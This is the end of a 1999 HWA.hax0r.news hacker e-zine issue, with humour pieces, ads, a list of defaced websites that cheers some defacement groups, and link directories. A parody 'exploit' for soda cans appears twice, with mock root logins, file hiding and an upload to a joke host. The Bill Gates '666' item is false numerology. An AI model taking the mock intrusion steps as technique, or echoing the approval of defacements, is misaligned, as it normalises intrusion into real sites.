       *           ATTRITION.ORG     Advisory Archive, Hacked Page Mirror          *
       *           ATTRITION.ORG     DoS Database, Crypto Archive                  *
       *           ATTRITION.ORG     Sarcasm, Rudeness, and More.                  * 
       *                                                                           *
       *****************************************************************************      
              
 
 
       When people ask you "Who is Kevin Mitnick?" do you have an answer? 
 
       www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.freekevi
       n.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnick.co
       m www.2600.com ########################################ww.2600.com www.freeke
       vin.com www.kev#  Support 2600.com and the Free Kevin #.com www.kevinmitnick.
       com www.2600.co#  defense fund site, visit it now! .  # www.2600.com www.free
       kevin.com www.k#             FREE KEVIN!              #in.com www.kevinmitnic
       k.com www.2600.########################################om www.2600.com www.fre
       ekevin.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnic
       k.com www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.fre

       http://www.2600.com/  http://www.kevinmitnick.com
       
       
       +-----------------------------------------------------------------------------+
       | SmoG Alert ..           http://smog.cjb.net/        NEWS on SCIENCE         |
       | ===================     http://smog.cjb.net/        NEWS on SECURITY        |
       | NEWS/NEWS/NEWS/NEWS     http://smog.cjb.net/        NEWS on THE NET         |
       |                         http://smog.cjb.net/        NEWS on TECHNOLOGY      |
       +-----------------------------------------------------------------------------+
       
       * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
       * www.csoft.net webhosting, shell, unlimited hits bandwidth ... www.csoft.net *
       *   www.csoft.net www.csoft.net www.csoft.net www.csoft.net www.csoft.net     *
       *  http://www.csoft.net" One of our sponsers, visit them now  www.csoft.net   * 
       * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
       
       

       * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
       * WWW.BIZTECHTV.COM/PARSE WEDNESDAYS AT 4:30PM EST, HACK/PHREAK CALL-IN WEBTV *
       * JOIN #PARSE FOR LIVE PARTICIPATION IN SHOW CHAT OR THE WEBCHAT, AND WEBBOARD*
       * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
       
       
       

       * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
       * WWW.2600.COM OFF THE HOOK LIVE NETCAST'S TUES SIMULCAST ON WBAI IN NYC @8PM *
       * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *


         //////////////////////////////////////////////////////////////////////////////
        //  To place an ad in this section simply type it up and email it to        //
       //        hwa@press,usmc.net, put AD! in the subject header please. - Ed    //
      //////////////////////////////////////////////////////////////////////////////


     @HWA
     
       
              
             
HA.HA Humour and puzzles ...etc
      ~~~~~~~~~~~~~~~~~~~~~~~~~
                                                           Don't worry. worry a *lot*
     
      Send in submissions for this section please! ............c'mon, you KNOW you
      wanna...yeah you do...make it fresh and new...be famous...<sic>
      
        ____                 _ _                                 _             _ _
       / ___|  ___ _ __   __| (_)_ __  _   _  ___  _   _ _ __   / \   ___  ___(_|_)
       \___ \ / _ \ '_ \ / _` | | '_ \| | | |/ _ \| | | | '__| / _ \ / __|/ __| | |
        ___) |  __/ | | | (_| | | | | | |_| | (_) | |_| | |   / ___ \\__ \ (__| | |
       |____/ \___|_| |_|\__,_|_|_| |_|\__, |\___/ \__,_|_|  /_/   \_\___/\___|_|_|
                                       |___/      
                                 / \   _ __| |_
                                / _ \ | '__| __|
                               / ___ \| |  | |_
                              /_/   \_\_|   \__| TOO, for inclusion in future issues
                              
       Do the HWA logo etc and we'll showcase it here to show off your talents...remember
       the 80's? dig out those ascii editors and do yer best...                       
      
                                               _|
                           _|_|_|    _|_|    _|_|_|_|
                         _|    _|  _|    _|    _|
                         _|    _|  _|    _|    _|
                           _|_|_|    _|_|        _|_|
                               _|
                           _|_|
                                                _|      _|_|
                _|  _|_|    _|_|      _|_|    _|_|_|_|      _|
                _|_|      _|    _|  _|    _|    _|      _|_|
                _|        _|    _|  _|    _|    _|
                _|          _|_|      _|_|        _|_|  _|
                
                
                
                      
                      
      
                                       _________________________
                              /|  /|  |                         |
                              ||__||  |  HAX0R FOR HIRE ...     |
                             /   O O\__                         |
                            /          \ WILL HACK FOR NETWORK  |
                           /      \     \     ACCESS!           |
                          /   _    \     \ ---------------------
                         /    |\____\     \     ||
                        /     | | | |\____/     ||
                       /       \|_|_|/   |    __||
                      /  /  \            |____| ||
                     /   |   | /|        |      --|
                     |   |   |//         |____  --|
              * _    |  |_|_|_|          |     \-/
           *-- _--\ _ \     //           |
             /  _     \\ _ //   |        /
           *  /   \_ /- | -     |       |
             *      ___ c_c_c_C/ \C_c_c_c____________   _________
           
      

       (Ascii art from V0iD magazine #7)         

       Contributed by VeRtIgO (who did the .avi included in this week's .zip file)
       
                   [19:43] <VeRtIg0> Bill Gates is the Antichrist
                   * Revelation 13:18 says:
                   *
                   *    Here is wisdom. Let him who has understanding calculate the
                   *    number of the beast, for it is the number of a man: His
                   *    number is 666.
                   
                           The real name of the Bill Gates is William Henry Gates III.
                           Nowadays he is known as Bill Gates (III), where "III" means
                           the order of third (3rd.)
                   
                           By converting the letters of his current name to the ASCII-
                           values (which are used in computers) you will get the
                           following:
                   
                           B    I    L    L    G    A    T    E    S    3
                   
                           66 + 73 + 76 + 76 + 71 + 65 + 84 + 69 + 83 + 3 = 666
                                                                            """
                           
       -----------------------------------------------------------------------------------------
       
       Amusing Opcodes

       BNE - Branch to Non-Existent code 
       BNR - Branch for No Reason. 
       BRA - Branch to Random Address 
       BVS - Branch to Virtual Subroutine 
       CLD - CalL a Doctor 
       CMD - Create Meaningless Data. 
       DEC - DElete the Code 
       DRA - Decrement Random Address. 
       EDR - Emit Deadly Radiation. 
       JMP - Jump if Memory Present (conditional jump) 
       LLI - Lose Last Instruction. 
       PRS - Push Results off Stack. 
       RIS - Remain In Subroutine. 
       RTI - Return from the Infinity 
       SHB - Scramble High order Bit. 
       TEC - Take Extra time for Calculation.                            


       -----------------------------------------------------------------------------------------
       
       
       
       Remote exploit for Pepsi and Coke cans
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
       http://packetstorm.securify.com/ 
       
       -----BEGIN PGP SIGNED HUMOR-----
            Hash: SHA1
      
      It seems cans of Pepsi and Diet Pepsi have
      a possible remote root problem on them.
      
      While recently eyeing a can of coke while
      sitting on my terminal I noticed that I could
      actually drink from it while standing at a
      distance of at least 3 feet.
      
      The sploit:
      
      Now when I first did this I was amazed and had
      to have a couple friends test it out before I
      submitted it so here it is...
      
      <beginpheer>
      ssh root@box.of.straws
      password ********
      
      login denied
      
      ssh root@box.of.dixie.straws
      password ********
      
      Welcome to Dixie Straws
      
      #[skr1ptkid@dixie.straw]su
      [s/key 99 xp03r33t]
      
      #[skr1ptkid@dixie.straw]skey 99 xp03r337
      Enter secret password:
      
      DONT REWT THIS BOXN PLSE
      #[skr1ptkid@dixie.straw]su
      [s/key 99 xp03r33t]
      Response:DONT REWT THIS BOXN PLSE
      
      #
      #
      #cat straw straw straw straw >> super.straw
      #mv superstraw ~/.superstraw *note... had to rename as .superstraw to hide
      from a normal ls*
      #
      #cd ~
      #ftp can.of.coke
      #(username) anonymous
      #(password) mike@hunt.com *note uberleet alias*
      #prompt
      #mput ~/.superstraw
      #quit
      
      ================================================
      
      Now there is no known resolution to this problem as of yet,
      but I will be working to ensure that no one else remotely
      close to my can of coke can root it.
      
      Temporary fix:
      I personally suggest something along these lines of
      security.
      
      ===================================================
      # !/dev/mouth
      # sil@antioffline.com
      # securepep.sh
      
      PATH=/dev/
      
      echo SecurePep.v1
      /bin/tar -cf saliva.tar ~/mouth/*
      scp saliva.tar root@can.of.coke:/;
      tar -xvf saliva.tar
      
      echo Now no one wants to drink any
      
      ===================================================
      
      Now this obviously has been done for fun, so cheers
      to those who enjoy a laugh and a big =P to those
      who don't... You only live once ;)
      
      -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
      Yours Truly
      Sil of AntiOffline
      sil@antioffline.com     http://www.antioffline.com
      mirrors: http://psyk0tik.mifits.org || http://xp0rnstar.self-evident.com
      sil@macroshaft.org      http://www.macroshaft.org
      mirrors: http://total.misfits.org
      sil@self-evident.com    http://www.self-evident.com
      
      
      "Windows -- "When do you want to reboot today?""
      
      ID 0x1281EC4F
      DH/DSS
      4096/1024
      CIPHER: CAST
      PGP Fingerprint
      46C0 6A83 E6D2 FEA6 383A  B9A6 44D3 4E77 1281 EC4F
      
      iQA/AwUBN6d/aETTTncSgexPEQLuAgCfRF5dpZii9yEPnqZ+F+
      AEbzB+KL0An3mXPk+Y8lZxkr0crgw72zPX5w71=tCpK
      -----END PGP SIGNATURE----------BEGIN PGP SIGNED HUMOR-----
                  Hash: SHA1
      
      It seems cans of Pepsi and Diet Pepsi have
      a possible remote root problem on them.
      
      While recently eyeing a can of coke while
      sitting on my terminal I noticed that I could
      actually drink from it while standing at a
      distance of at least 3 feet.
      
      The sploit:
      
      Now when I first did this I was amazed and had
      to have a couple friends test it out before I
      submitted it so here it is...
      
      <beginpheer>
      ssh root@box.of.straws
      password ********
      
      login denied
      
      ssh root@box.of.dixie.straws
      password ********
      
      Welcome to Dixie Straws
      
      #[skr1ptkid@dixie.straw]su
      [s/key 99 xp03r33t]
      
      #[skr1ptkid@dixie.straw]skey 99 xp03r337
      Enter secret password:
      
      DONT REWT THIS BOXN PLSE
      #[skr1ptkid@dixie.straw]su
      [s/key 99 xp03r33t]
      Response:DONT REWT THIS BOXN PLSE
      
      #
      #
      #cat straw straw straw straw >> super.straw
      #mv superstraw ~/.superstraw *note... had to rename as .superstraw to hide
      from a normal ls*
      #
      #cd ~
      #ftp can.of.coke
      #(username) anonymous
      #(password) mike@hunt.com *note uberleet alias*
      #prompt
      #mput ~/.superstraw
      #quit
      
      ================================================
      
      Now there is no known resolution to this problem as of yet,
      but I will be working to ensure that no one else remotely
      close to my can of coke can root it.
      
      Temporary fix:
      I personally suggest something along these lines of
      security.
      
      ===================================================
      # !/dev/mouth
      # sil@antioffline.com
      # securepep.sh
      
      PATH=/dev/
      
      echo SecurePep.v1
      /bin/tar -cf saliva.tar ~/mouth/*
      scp saliva.tar root@can.of.coke:/;
      tar -xvf saliva.tar
      
      echo Now no one wants to drink any
      
      ===================================================
      
      Now this obviously has been done for fun, so cheers
      to those who enjoy a laugh and a big =P to those
      who don't... You only live once ;)
      
      -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
      Yours Truly
      Sil of AntiOffline
      sil@antioffline.com     http://www.antioffline.com
      mirrors: http://psyk0tik.mifits.org || http://xp0rnstar.self-evident.com
      sil@macroshaft.org      http://www.macroshaft.org
      mirrors: http://total.misfits.org
      sil@self-evident.com    http://www.self-evident.com
      
      
      "Windows -- "When do you want to reboot today?""
      
      ID 0x1281EC4F
      DH/DSS
      4096/1024
      CIPHER: CAST
      PGP Fingerprint
      46C0 6A83 E6D2 FEA6 383A  B9A6 44D3 4E77 1281 EC4F
      
      iQA/AwUBN6d/aETTTncSgexPEQLuAgCfRF5dpZii9yEPnqZ+F+
      AEbzB+KL0An3mXPk+Y8lZxkr0crgw72zPX5w71=tCpK
      -----END PGP SIGNATURE-----


       -


      
     @HWA
       
       
       
 SITE.1 
 
      http://www.cs.unm.edu/~dlchao/flake/doom/
      
      http://www.geocities.com/doomhack/
      
      These are a couple of wierd sites, what they purports to be is a Doom
      <>Back Orifice interface where PID's on the host machine are represented
      in DOOM as monsters, kill the monster and BO kills the PID on the host 
      machine, strange? sure is, found this while sifting through the cDc q&a 
      session  responses... someone was really bored when they came up with 
      this idea!
 
      
      You can Send in submissions for this section too if you've found 
      (or RUN) a cool site...
       
        
       
      @HWA
       
         
         
  H.W Hacked websites 
      ~~~~~~~~~~~~~~~~

      Note: The hacked site reports stay, especially with some cool hits by
            groups like *H.A.R.P, go get em boyz racism is a mugs game! - Ed

          * Hackers Against Racist Propaganda (See issue #7)

     
      Haven't heard from Catharsys in a while for those following their saga visit
      http://frey.rapidnet.com/~ptah/ for 'the story so far'...
      
      Hacker groups breakdown is available at Attrition.org
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      check out http://www.attrition.org/mirror/attrition/groups.html to see who
      you are up against. You can often gather intel from IRC as many of these
      groups maintain a presence by having a channel with their group name as the
      channel name, others aren't so obvious but do exist.
      
      

      US Army Reserve Command (www.usarc.army.mil) 
      Yukon Territories Government (www.gov.yk.ca) 
      Bexon (bexon.com) 
      Utad (PT) (ermelo.utad.pt) 
      Alper Brandon (www.alperbrandon.com) 
      Auto Body World (www.autobodyworld.com) 
      Catering Net (UK) (www.cateringnet.co.uk) 
      Cleveland Ohio (www.cleveland.oh.us) 
      GAA (IE) (www.gaa.ie) 
      Monkey Army (www.monkeyarmy.com) 
      The Renaissance (www.therenaissance.org) 
      USBBOG Edu (CO) (www.usbbog.edu.co) 
      Zeronet (AU) (www.zeronet.com.au) 
      Inca Tek (www.incatek.com) 
      Crayon Rouge (www.crayonrouge.com) 
      Blaklocks Flickan (NU) (www.blaklocksflickan.nu)  
      



           
      and more sites at the attrition cracked web sites mirror:
                   
                    http://www.attrition.org/mirror/attrition/index.html 

       -------------------------------------------------------------------------
       
  A.0                              APPENDICES
       _________________________________________________________________________



  A.1 PHACVW, sekurity, security, cyberwar links
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

       The links are no longer maintained in this file, there is now a
      links section on the http://welcome.to/HWA.hax0r.news/ url so check
      there for current links etc.

      The hack FAQ (The #hack/alt.2600 faq)
      http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html
      
      Hacker's Jargon File (The quote file)
      http://www.lysator.liu.se/hackdict/split2/main_index.html
      
      New Hacker's Jargon File.
      http://www.tuxedo.org/~esr/jargon/ 
      
      
      
      HWA.hax0r.news Mirror Sites around the world:
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      http://the.wiretapped.net/security/textfiles/hWa.hax0r.news/ ** NEW **
      http://net-security.org/hwahaxornews ** NEW **
      http://www.sysbreakers.com/hwa ** NEW **
      http://www.attrition.org/hosted/hwa/
      http://www.attrition.org/~modify/texts/zines/HWA/
      http://www.hackunlimited.com/files/secu/papers/hwa/ ** NEW **
      http://www.ducktank.net/hwa/issues.html. ** NEW **
      http://www.alldas.de/hwaidx1.htm ** NEW **
      http://www.csoft.net/~hwa/ 
      http://www.digitalgeeks.com/hwa.*DOWN*
      http://members.tripod.com/~hwa_2k
      http://welcome.to/HWA.hax0r.news/
      http://www.attrition.org/~modify/texts/zines/HWA/
      http://archives.projectgamma.com/zines/hwa/.  
      http://www.403-security.org/Htmls/hwa.hax0r.news.htm
      http://viper.dmrt.com/files/=E-Zines/HWA.hax0r.news/
      http://hwa.hax0r.news.8m.com/           
      http://www.fortunecity.com/skyscraper/feature/103/  
      

      International links:(TBC)
      ~~~~~~~~~~~~~~~~~~~~~~~~~

      Foreign correspondants and others please send in news site links that
      have security news from foreign countries for inclusion in this list
      thanks... - Ed

      
          
      Belgium.......: http://bewoner.dma.be/cum/              
      
      Brasil........: http://www.psynet.net/ka0z              
            
                      http://www.elementais.cjb.net           
            
      Canada .......: http://www.hackcanada.com
      Croatia.......: http://security.monitor.hr
      
      Columbia......: http://www.cascabel.8m.com              
      
                      http://www.intrusos.cjb.net                                   
                      
      Finland ........http://hackunlimited.com/                
                      
      Germany ........http://www.alldas.de/
                      http://www.security-news.com/
      
      Indonesia.....: http://www.k-elektronik.org/index2.html 
      
                      http://members.xoom.com/neblonica/      
      
                      http://hackerlink.or.id/                
      
      Netherlands...: http://security.pine.nl/                
      
      Russia........: http://www.tsu.ru/~eugene/              
      
      Singapore.....: http://www.icepoint.com                 
      
      South Africa ...http://www.hackers.co.za       
                      http://www.hack.co.za            
                      http://www.posthuman.za.net 
 
                      
      Turkey........: http://www.trscene.org - Turkish Scene is Turkey's first and best security related e-zine.
      
                      
                       
                      
                      
                      
    .za (South Africa) sites contributed by wyzwun tnx guy...                  
      
      


    Got a link for this section? email it to hwa@press.usmc.net and i'll
    review it and post it here if it merits it.

    @HWA
    

  -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
    --EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--

     1998, 1999 (c) Cruciphux/HWA.hax0r.news <tm> (R) { w00t }
    
  -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-                       
     --EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--
  -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
   [ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
       [45:6E:64]-[28:63:29:31:39:39:38:20:68:77:61:20:73:74:65:76:65]    


